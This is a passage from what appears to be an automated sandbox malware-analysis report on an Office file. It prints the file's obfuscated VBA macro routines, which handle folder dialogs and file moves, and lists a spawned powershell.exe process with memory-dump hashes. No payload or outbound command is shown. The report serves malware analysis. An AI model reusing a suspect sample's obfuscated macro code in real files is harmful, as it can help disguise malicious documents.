    shb.Range("a" & shb.Rows.Count).End(xlUp).Offset(1).Resize( , ra.Rows.Count).Value = Application.WorksheetFunction.Transpose(ra.Value)

    Resize

    Rows

    Transpose

    Value

    36

    WB.Close False

    Close

    36

    DoEvents

    DoEvents

    37

    pi.Log vbTab & "."

    Log

    vbTab

    38

    Name FileName As ArchieveFolder$ & Dir(FileName, vbNormal)

    Dir

    vbNormal

    39

    Endif

    40

    Next

    41

    pi.Hide

    Hide

    41

    DoEvents

    DoEvents

    41

    Application.ScreenUpdating = True

    ScreenUpdating

    42

    MsgBox "", vbInformation

    MsgBox

    vbInformation

    43

    End Sub

    Function bcbcmbvbvch3h2yg3u5i4tyirugiu, APIs: 20, Strings: 10, Number of lines: 32, Relevance: 45.032
    APIsMeta Information

    Clear

    IIf

    Len

    PROJECT_NAME$

    GetSetting

    Name

    Application

    Len

    Dir

    vbDirectory

    Len

    Dir

    vbDirectory

    Path

    ThisWorkbook

    Title

    Right$

    SaveSetting

    Name

    Application

    StringsDecrypted Strings
    ","
    """"
    "folder"
    """"
    """"
    """"
    """"
    """"
    "\"
    "folder"
    LineInstructionMeta Information
    81

    Function bcbcmbvbvch3h2yg3u5i4tyirugiu(optional ByVal FolderIndex& = 0, optional ByVal ShowDialog as Boolean = False, optional ByVal Title$ = "", optional ByVal InitialFolder$) as String

    82

    On Error Resume Next

    82

    Err.Clear

    Clear

    83

    ProjectName$ = IIf(Len(PROJECT_NAME$) > 0, PROJECT_NAME$, ",")

    IIf

    Len

    PROJECT_NAME$

    84

    PreviousFolder$ = GetSetting(Application.Name, ProjectName$, "folder" & FolderIndex&, "")

    GetSetting

    Name

    Application

    85

    If Len(PreviousFolder$) > 0 And Not ShowDialog Then

    Len

    86

    If Dir(PreviousFolder$, vbDirectory) <> "" Then

    Dir

    vbDirectory

    86

    GetFolder = PreviousFolder$

    86

    Exit Function

    86

    Endif

    87

    Endif

    88

    If InitialFolder$ = "" Then

    89

    If Len(PreviousFolder$) > 0 And Dir(PreviousFolder$, vbDirectory) <> "" Then

    Len

    Dir

    vbDirectory

    90

    InitialFolder$ = PreviousFolder$

    91

    Else

    92

    InitialFolder$ = ThisWorkbook.Path & "\"

    Path

    ThisWorkbook

    93

    Endif

    94

    Endif

    95

    With Application.FileDialog(msoFileDialogFolderPicker)

    96

    . ButtonName = ""

    96

    . Title = Title

    Title

    96

    . InitialFileName = InitialFolder$

    97

    If . Show <> - 1 Then

    97

    Exit Function

    97

    Endif

    98

    GetFolder = . SelectedItems(1)

    99

    If Not Right$(GetFolder, 1) = "\" Then

    Right$

    99

    GetFolder = GetFolder & "\"

    99

    Endif

    100

    SaveSetting Application.Name, ProjectName$, "folder" & FolderIndex&, GetFolder

    SaveSetting

    Name

    Application

    101

    End With

    102

    End Function

    Subroutine gdekkefh32yeyf8tasf8gqw8dgfiaxdbaflpo3pt23hf, APIs: 4, Strings: 5, Number of lines: 16, Relevance: 13.516
    APIsMeta Information

    Clear

    GetFolder

    GetFolder

    GetFolder

    StringsDecrypted Strings
    """"
    """"
    """"
    """"
    """"
    LineInstructionMeta Information
    44

    Sub gdekkefh32yeyf8tasf8gqw8dgfiaxdbaflpo3pt23hf()

    45

    On Error Resume Next

    45

    Err.Clear

    Clear

    46

    folder_1$ = GetFolder(1, , "")

    GetFolder

    47

    If folder_1$ = "" Then

    47

    Exit Sub

    47

    Endif

    48

    folder_2$ = GetFolder(2, , , folder_1$)

    GetFolder

    49

    If folder_2$ = "" Then

    49

    Exit Sub

    49

    Endif

    50

    folder_3$ = GetFolder( , True, "")

    GetFolder

    51

    If folder_3$ = "" Then

    51

    Exit Sub

    51

    Endif

    52

    End Sub

    Subroutine fhowi34hotaildovgjuspozao3ethao4wthihegf, APIs: 3, Strings: 2, Number of lines: 7, Relevance: 7.507
    APIsMeta Information

    GetFolder

    MsgBox

    vbInformation

    StringsDecrypted Strings
    """"
    ":"
    LineInstructionMeta Information
    65

    Sub fhowi34hotaildovgjuspozao3ethao4wthihegf()

    66

    folder$ = GetFolder()

    GetFolder

    67

    If folder$ = "" Then

    67

    Exit Sub

    67

    Endif

    68

    MsgBox ":" & folder$, vbInformation

    MsgBox

    vbInformation

    69

    End Sub

    Subroutine dgfhoswihetaoihegaosoaihcbi, APIs: 1, Strings: 0, Number of lines: 4, Relevance: 1.254
    APIsMeta Information

    GetFolder

    LineInstructionMeta Information
    78

    Sub dgfhoswihetaoihegaosoaihcbi()

    79

    On Error Resume Next

    79

    GetFolder , True

    GetFolder

    80

    End Sub

    Reset < >

      Analysis Process: powershell.exe PID: 2840 Parent PID: 2632 powershell.exeCOMMON

      Executed Functions

      Function 000007FF00271121, Relevance: .1, Instructions: 82COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000004.00000002.432859061.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_7ff00270000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 3a73973a3205e80d0ad2d572ae4da845bcd68694cc9c7b114c1f406103f6f613
      • Instruction ID: 7f645f0a0bb4d83ccdea21c757fac5b039009eaaed9af91e9a1267d2911fccde
      • Opcode Fuzzy Hash: 3a73973a3205e80d0ad2d572ae4da845bcd68694cc9c7b114c1f406103f6f613
      • Instruction Fuzzy Hash: 2C11996144E3C68FD3038B789C256953FB1AF43214B1A01D7D8C8CF0B3E25D4A9AC762
      Uniqueness

      Uniqueness Score: -1.00%

      Non-executed Functions

      Function 000007FF00270F3C, Relevance: .1, Instructions: 72COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000004.00000002.432859061.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_7ff00270000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: b69bbaaf4692e46fd409352025d5c205e2b04360ada7efc9d6380c0efc575df3
      • Instruction ID: 3602658769e024f799cd1c6d9b470e71be684e262397f8f78d31c4e772cc6c4c
      • Opcode Fuzzy Hash: b69bbaaf4692e46fd409352025d5c205e2b04360ada7efc9d6380c0efc575df3
      • Instruction Fuzzy Hash: 77017A6655E7D58FD70387749C68A903FB0AF53210F0A06DBD084CF0E3E2585A5AD362
      Uniqueness

      Uniqueness Score: -1.00%